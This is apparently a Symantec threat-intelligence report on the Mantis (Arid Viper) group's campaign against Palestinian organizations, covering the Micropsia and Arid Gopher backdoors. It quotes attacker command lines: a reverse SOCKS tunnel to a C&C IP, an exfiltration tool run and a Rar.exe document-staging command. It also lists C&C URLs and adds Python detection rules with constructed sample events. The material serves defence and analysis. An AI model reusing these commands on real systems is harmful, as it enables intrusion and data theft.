The Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.
While the group is known for targeting organizations in the Middle East, the most recent campaign uncovered by Symantec, by Broadcom Software, focused on organizations within the Palestinian territories, with malicious activity beginning in September 2022 and continuing to at least February 2023. This targeting is not unprecedented for Mantis and Symantec previously uncovered attacks against individuals located in the Palestinian territories during 2017.
Background
Mantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as early as 2011. The group is known to target organizations in Israel and a number of other Middle Eastern countries. Sectors targeted include government, military, financial, media, education, energy, and think tanks. The group is known for employing spear-phishing emails and fake social media profiles to lure targets into installing malware on their devices.
Mantis is widely accepted to be linked to the Palestinian territories. While other vendors have linked the group to Hamas, Symantec cannot make a definitive attribution to any Palestinian organization.
In its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to compromise targets before engaging in extensive credential theft and exfiltration of stolen data.
Attack chain
The initial infection vector for this campaign remains unknown. In one organization targeted, a feature of the compromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.
The following is a description of how one of those three toolsets was used:
The first evidence of malicious activity occurred on December 18, 2022. Three distinct sets of obfuscated PowerShell commands were executed to load a Base64-encoded string, which launched embedded shellcode. The shellcode was a 32-bit stager that downloaded another stage using a basic TCP-based protocol from a command-and-control (C&C) server: 104.194.222[.]50 port 4444.
The attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and PuTTY, a publicly available SSH client, using Certutil and BITSAdmin.
Micropsia subsequently executed and initiated contact with a C&C server. On the same day, Micropsia also executed on three other machines in the same organization. In each case, it ran in a folder named after its file name:
- csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
- csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
- csidl_common_appdata\windowsps\windowsps.exe
On one computer, Micropsia was used to set up a reverse socks tunnel to an external IP address:
CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED]
On December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the infected computers.
The following day, December 21, RAR was executed to archive files on another infected computer.
Between December 22 and January 2, 2023, Micropsia was used to execute the Arid Gopher backdoor on three infected computers. Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided persistence by adding Arid Gopher to the registry so that it executed on reboot. It also ran an unknown file named localsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).
On December 28, Micropsia was used to run windowspackages.exe on three more infected computers.
On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two of the infected computers.
On January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant. Whether this was because the first version was discovered or whether it was standard operating procedure is unclear.
On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single computer from the folder: csidl_common_appdata\hostupbroker\hostupbroker.exe. This was immediately followed by the exfiltration of a RAR file:
CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\1-04-2023-15-13-39_getf.rar
On January 9, Arid Gopher was used to execute two unknown files on a single computer:
- csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
- csidl_common_appdata\embededmodeservice\embededmodeservice.exe
The last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the unknown file named localsecuritypolicy.exe every ten hours.
Micropsia
Variants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by other vendors. In this campaign, Micropsia was deployed using multiple file names and file paths:
- csidl_common_appdata\microsoftdotnet35\microsoftdotnet35.exe
- csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
- csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
- csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
- csidl_common_appdata\windowsps\windowsps.exe
Micropsia is executed using WMI and its main purpose appears to be running secondary payloads for the attackers. These included:
- Arid Gopher (file names: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
- Reverse SOCKS Tunneler (aka Revsocks) (file name: windowsservicemanageav.exe)
- Data Exfiltration Tool (file name: windowsupserv.exe)
- Two unknown files, both named hostupbroker.exe
- Unknown file named windowspackages.exe
In addition to this, Micropsia has its own functionality, such as taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration:
"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PROGRAMDATA%\Software Distributions\BdlLMth__C_2023-02-13 17-14-41" "%USERPROFILE%\*.xls" "%USERPROFILE%\*.xlsx" "%USERPROFILE%\*.doc" "%USERPROFILE%\*.docx" "%USERPROFILE%\*.csv" "%USERPROFILE%\*.pdf" "%USERPROFILE%\*.ppt" "%USERPROFILE%\*.pptx" "%USERPROFILE%\*.odt" "%USERPROFILE%\*.mdb" "%USERPROFILE%\*.accdb" "%USERPROFILE%\*.accde" "%USERPROFILE%\*.txt" "%USERPROFILE%\*.rtf" "%USERPROFILE%\*.vcf"
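The command lines quoted in the attack chain and in this section (the encoded PowerShell loader, binaries run from a ProgramData folder named after themselves, the Revsocks "-connect" tunnel, and the Rar.exe staging command) lend themselves to process-creation detection rules. The following is an added example, not code from Symantec or from the report; the events are constructed to mirror the quoted command lines, and the rule names are assumptions.

```python
import re
# Constructed process-creation events (image path and command line), modelled on the
# command lines quoted in this article; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + "QUJD" * 20},
    {"image": r"C:\ProgramData\windowsps\windowsps.exe",
     "cmdline": r"C:\ProgramData\windowsps\windowsps.exe"},
    {"image": r"C:\ProgramData\windowsservicemanageav\windowsservicemanageav.exe",
     "cmdline": r"C:\ProgramData\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222.50:443"},
    {"image": r"C:\ProgramData\Software Distributions\WinRAR\Rar.exe",
     "cmdline": r'"C:\ProgramData\Software Distributions\WinRAR\Rar.exe" a -r -ep1 -v2500k -hpSECRET '
                r'-ta2023-01-14 "C:\ProgramData\out" "C:\Users\u\*.docx" "C:\Users\u\*.pdf" "C:\Users\u\*.xlsx"'},
    {"image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" a report.rar "C:\Users\u\Documents\report.docx"'},
]
# Rule: executable launched from %ProgramData%\<name>\<name>.exe, the folder-named-after-binary
# layout Micropsia and its payloads used here (the backreference enforces the mirrored name).
MIRRORED_DIR = re.compile(r"\\programdata\\([^\\]+)\\\1\.exe$", re.IGNORECASE)
# Rule: PowerShell given an encoded command or decoding Base64 inline (the stager loader).
PS_ENCODED = re.compile(r"frombase64string|\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)
# Rule: a reverse tunnel client pointed at an external ip:port (the Revsocks "-connect" form).
REVSOCKS = re.compile(r"\s-connect\s+\d{1,3}(?:\.\d{1,3}){3}:\d+", re.IGNORECASE)
# Rule: Rar.exe with an encrypting password (-hp), a date filter (-ta) and several document
# wildcards under a user profile, i.e. the staging command shown above.
DOC_EXTS = {"xls", "xlsx", "doc", "docx", "csv", "pdf", "ppt", "pptx", "odt",
            "mdb", "accdb", "accde", "txt", "rtf", "vcf"}
USER_WILDCARD = re.compile(r"[A-Z]:\\Users\\[^\"\s]*\\\*\.(\w+)", re.IGNORECASE)

def classify(event):
    """Return the names of the rules that match one process-creation event."""
    image, cmd = event["image"], event["cmdline"]
    exe = image.lower().rsplit("\\", 1)[-1]
    hits = []
    if MIRRORED_DIR.search(image):
        hits.append("programdata_mirrored_dir")
    if exe == "powershell.exe" and PS_ENCODED.search(cmd):
        hits.append("powershell_encoded_loader")
    if REVSOCKS.search(cmd):
        hits.append("reverse_tunnel_connect")
    if exe == "rar.exe" and " -hp" in cmd and " -ta" in cmd:
        exts = {m.group(1).lower() for m in USER_WILDCARD.finditer(cmd)}
        if len(exts & DOC_EXTS) >= 3:
            hits.append("rar_document_staging")
    return hits

def scan(events):
    """Map each flagged image path to its matching rules; unflagged events are dropped."""
    return {e["image"]: h for e in events if (h := classify(e))}
```

The ordinary WinRAR invocation in the sample is left unflagged, which is the point of requiring the password, date filter and document-wildcard combination rather than matching on the archiver alone.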
Arid Gopher
Unlike Micropsia, which is written in Delphi, Arid Gopher is written in Go. Versions of Arid Gopher used in this campaign contain the following embedded components:
- 7za.exe – A copy of the legitimate 7-Zip executable
- AttestationWmiProvider.exe – A tool that sets a “run” registry value
- ServiceHubIdentityHost.exe – A copy of legitimate Shortcut.exe executable from Optimum X
- Setup.env – Configuration file
Arid Gopher was also used to launch the following unknown files: networkswitcherdatamodell.exe, localsecuritypolicy.exe, and networkuefidiagsbootserver.exe, in addition to being used to download and execute files obfuscated with PyArmor.
When communicating with a C&C server, Arid Gopher registers a device on one path then connects to another path, likely to receive commands:
- Connects to: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – likely to register device
- Followed by: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – likely to receive commands
- Connects to: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – likely to register device
- Followed by: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – likely to receive commands
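The two-step pattern above (a registration request followed by a command-fetch request on the same host under the same leading path segment) can be correlated in web proxy logs. This is an added example rather than code from the report; the log lines are constructed from the paths quoted above, and the treatment of the first path segment as a campaign identifier is an assumption.

```python
from urllib.parse import urlsplit

# Constructed proxy log ("<epoch> <client> <url>") modelled on the Arid Gopher C&C paths
# quoted above; not real telemetry.
PROXY_LOG = """\
1673600000 10.0.0.7 http://jumpstartmail.com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv
1673600012 10.0.0.7 http://jumpstartmail.com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC
1673600100 10.0.0.9 http://example.org/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC
1673600200 10.0.0.11 http://salimafia.net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv
"""

# Path tails seen in this campaign: the first request appears to register the device, the
# second appears to fetch commands. The leading segment (IURTIER3BNV4ER) is assumed to be a
# campaign identifier and is only required to be the same for both requests.
REGISTER_TAIL = "DWL1RucGSj/4wwA7S8jQv"
COMMAND_TAIL = "AJLUK9BI48/0L6W3CSBMC"

def parse(log):
    """Yield (timestamp, client, host, campaign_segment, path_tail) for each log line."""
    for line in log.splitlines():
        ts, client, url = line.split(maxsplit=2)
        parts = urlsplit(url)
        campaign, _, tail = parts.path.strip("/").partition("/")
        yield int(ts), client, parts.hostname, campaign, tail

def find_beacon_sequences(log, max_gap=600):
    """Group requests by (client, host, campaign) and classify each group:
    'sequence' when the command fetch follows registration within max_gap seconds,
    'register_only' or 'command_only' when just one side of the exchange was seen."""
    registered = {}
    result = {"sequence": [], "register_only": [], "command_only": []}
    for ts, client, host, campaign, tail in sorted(parse(log)):
        key = (client, host, campaign)
        if tail == REGISTER_TAIL:
            registered[key] = ts
        elif tail == COMMAND_TAIL:
            if key in registered and ts - registered[key] <= max_gap:
                del registered[key]
                result["sequence"].append(key)
            else:
                result["command_only"].append(key)
    result["register_only"] = list(registered)  # registered, never fetched commands in time
    return result
```

A lone registration or a lone command fetch is still reported, since a host that only completed half the exchange is worth a look as well.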
Arid Gopher appears to be regularly updated and rewritten by the attackers, most likely in order to evade detection. One variant of the malware was radically different from previous versions seen with most of the distinctive code updated, so much so that there was not a single subroutine that contained identical distinctive code when compared with the previous version. Mantis appeared to be aggressively mutating the logic between variants, which is a time-intensive operation if done manually.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks